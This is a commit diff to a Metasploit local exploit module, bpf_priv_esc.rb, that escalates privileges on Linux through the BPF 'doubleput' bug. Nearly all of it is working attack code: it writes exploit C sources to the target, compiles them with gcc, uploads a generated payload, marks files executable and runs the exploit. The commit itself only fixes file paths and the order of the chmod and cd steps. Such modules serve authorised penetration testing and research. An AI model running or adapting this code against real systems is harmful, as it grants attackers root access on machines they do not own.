compile or nill

2016-09-29 06:15:17 -04:00 · 2016-09-29 06:15:17 -04:00 · bac4a25b2c
parent 4fac5271ae
commit bac4a25b2c
1 changed files with 6 additions and 5 deletions
--- a/modules/exploits/linux/local/bpf_priv_esc.rb
+++ b/modules/exploits/linux/local/bpf_priv_esc.rb
@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
        vprint_status("Writing #{filename} to #{file_path}.c")
        write_file("#{file_path}.c", file_content)
        register_file_for_cleanup("#{file_path}.c")
-        output = cmd_exec(compile) #"gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`")
+        output = cmd_exec(compile)
        if output != ''
          print_error(output)
          fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
@ -127,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Local
        vprint_status("Writing #{filename} to #{file_path}")
        write_file(file_path, file_content)
      end
+      cmd_exec("chmod +x #{file_path}"); 
      register_file_for_cleanup(file_path)
    end

@ -464,15 +465,15 @@ class MetasploitModule < Msf::Exploit::Local
    doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
                'exit(0);')
    print_status('Writing files to target')
+    cmd_exec("cd #{datastore['WritableDir']}")
    upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)
-    upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_filename} #{doubleput_filename}.c -Wall" : nil)
+    upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil)
    upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil)
    upload_and_compile('payload', payload_path, generate_payload_exe)
-    cmd_exec("chmod 555 #{payload_filename}")
-    cmd_exec("cd #{datastore['WritableDir']}")
+    #cmd_exec("chmod 555 #{payload_filename}")
    print_status('Starting execution of priv esc.  This may take about 120 seconds')

-    cmd_exec("chmod +x #{doubleput_file}; #{doubleput_file}") # we use & to not destroy our original shell
+    cmd_exec(doubleput_file)
    sec_waited = 0
    until sec_waited > datastore['MAXWAIT'] do
      Rex.sleep(1)